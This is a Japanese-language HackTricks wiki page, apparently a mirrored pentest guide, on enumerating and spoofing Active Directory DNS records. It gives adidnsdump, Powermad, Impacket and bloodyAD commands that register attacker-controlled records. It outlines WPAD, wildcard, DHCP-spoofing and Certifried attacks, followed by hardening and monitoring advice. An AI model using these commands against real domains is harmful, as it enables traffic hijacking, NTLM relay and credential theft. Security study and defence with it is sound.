maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/windows-hardening/active-directory-methodology/ad-dns-records.md

5.9 KiB
Raw Blame History

AD DNS Records

{{#include ../../banners/hacktricks-training.md}}

デフォルトでは、Active DirectoryのすべてのユーザーがドメインまたはフォレストDNSゾーン内のすべてのDNSレコードを列挙できます。これはゾーン転送に似ていますユーザーはAD環境内のDNSゾーンの子オブジェクトをリストできます

ツールadidnsdumpは、内部ネットワークの偵察目的でゾーン内のすべてのDNSレコードの列挙エクスポートを可能にします。

git clone https://github.com/dirkjanm/adidnsdump
cd adidnsdump
pip install .

# Enumerate the default zone and resolve the "hidden" records
adidnsdump -u domain_name\\username ldap://10.10.10.10 -r

# Quickly list every zone (DomainDnsZones, ForestDnsZones, legacy zones,…)
adidnsdump -u domain_name\\username ldap://10.10.10.10 --print-zones

# Dump a specific zone (e.g. ForestDnsZones)
adidnsdump -u domain_name\\username ldap://10.10.10.10 --zone _msdcs.domain.local -r

cat records.csv

adidnsdump v1.4.0 (2025年4月) は、JSON/Greppable (--json) 出力、マルチスレッドDNS解決、およびLDAPSにバインドする際のTLS 1.2/1.3のサポートを追加します。

詳細については、https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/をお読みください。

レコードの作成 / 修正 (ADIDNSスプーフィング)

Authenticated Users グループはデフォルトでゾーンDACLに Create Child 権限を持っているため、任意のドメインアカウント(またはコンピュータアカウント)が追加のレコードを登録できます。 これは、トラフィックハイジャック、NTLMリレー強制、または完全なドメイン侵害に利用できます。

PowerMad / Invoke-DNSUpdate (PowerShell)

Import-Module .\Powermad.ps1

# Add A record evil.domain.local → attacker IP
Invoke-DNSUpdate -DNSType A -DNSName evil -DNSData 10.10.14.37 -Verbose

# Delete it when done
Invoke-DNSUpdate -DNSType A -DNSName evil -DNSData 10.10.14.37 -Delete -Verbose

Impacket dnsupdate.py (Python)

# add/replace an A record via secure dynamic-update
python3 dnsupdate.py -u 'DOMAIN/user:Passw0rd!' -dc-ip 10.10.10.10 -action add -record evil.domain.local -type A -data 10.10.14.37

(dnsupdate.pyはImpacket ≥0.12.0に付属しています)

BloodyAD

bloodyAD -u DOMAIN\\user -p 'Passw0rd!' --host 10.10.10.10 dns add A evil 10.10.14.37

一般的な攻撃プリミティブ

  1. ワイルドカードレコード *.<zone> はAD DNSサーバーをLLMNR/NBNSスプーフィングに似た企業全体のレスポンダーに変えます。これを悪用してNTLMハッシュをキャプチャしたり、LDAP/SMBに中継したりできます。WINSルックアップを無効にする必要があります。
  2. WPADハイジャック wpad(または攻撃者ホストを指すNSレコードを追加して、グローバルクエリブロックリストをバイパスし、外向きのHTTPリクエストを透過的にプロキシして資格情報を収集します。Microsoftはワイルドカード/DNAMEバイパスCVE-2018-8320を修正しましたが、NSレコードはまだ機能します
  3. 古いエントリの取得 以前ワークステーションに属していたIPアドレスを主張すると、関連するDNSエントリはまだ解決され、リソースベースの制約付き委任やシャドウ資格情報攻撃をDNSに触れずに実行できます。
  4. DHCP → DNSスプーフィング デフォルトのWindows DHCP+DNS展開では、同じサブネット上の認証されていない攻撃者が、動的DNS更新をトリガーする偽のDHCPリクエストを送信することで、既存のAレコードドメインコントローラーを含むを上書きできますAkamai “DDSpoof”, 2023。これにより、Kerberos/LDAPに対する中間者攻撃が可能になり、完全なドメイン取得につながる可能性があります。
  5. Certifried (CVE-2022-26923) 制御しているマシンアカウントのdNSHostNameを変更し、一致するAレコードを登録して、その名前の証明書を要求してDCを偽装します。CertipyBloodyADなどのツールは、このフローを完全に自動化します。

検出と強化

  • 認証ユーザーに対して、敏感なゾーンでのすべての子オブジェクトを作成する権利を拒否し、動的更新をDHCPで使用される専用アカウントに委任します。
  • 動的更新が必要な場合は、ゾーンをセキュアのみに設定し、DHCPで名前保護を有効にして、所有者のコンピュータオブジェクトのみが自分のレコードを上書きできるようにします。
  • DNSサーバーのイベントID 257/252動的更新、770ゾーン転送、およびCN=MicrosoftDNS,DC=DomainDnsZonesへのLDAP書き込みを監視します。
  • 危険な名前(wpadisatap*)を意図的に無害なレコードまたはグローバルクエリブロックリストを介してブロックします。
  • DNSサーバーをパッチ適用された状態に保ちます 例えば、RCEバグCVE-2024-26224およびCVE-2024-26231はCVSS 9.8に達し、ドメインコントローラーに対してリモートで悪用可能です。

参考文献

  • Kevin Robertson “ADIDNS Revisited WPAD, GQBL and More” (2018年、ワイルドカード/WPAD攻撃の事実上のリファレンス)
  • Akamai “DHCP DNS動的更新を悪用したDNSレコードのスプーフィング” (2023年12月) {{#include ../../banners/hacktricks-training.md}}